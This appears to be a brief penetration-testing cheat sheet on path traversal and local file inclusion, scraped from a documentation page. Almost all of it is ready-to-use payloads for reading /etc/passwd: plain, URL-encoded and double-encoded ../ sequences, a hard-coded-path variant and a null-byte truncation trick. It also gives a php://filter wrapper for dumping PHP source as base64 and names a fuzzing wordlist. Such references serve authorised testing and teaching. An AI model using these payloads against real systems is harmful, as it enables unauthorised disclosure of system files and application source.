Path Traversal
Exploit
Section titled “Exploit”../../../etc/passwdEncoded
Section titled “Encoded”/%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwdDouble encoded
Section titled “Double encoded”%252e%252e%252f%252e%252e%252fetc%252fpasswdHard-coded path
Section titled “Hard-coded path”/var/www/images/../../../etc/passwdNull byte
Section titled “Null byte”Append %00, character following null byte will be ignored
../../../../../passwd%00php://filter/read=convert.base64-encode/resource=index.phpFuzzing
Section titled “Fuzzing”Fuzz using LFI-Jhaddix.txt wordlist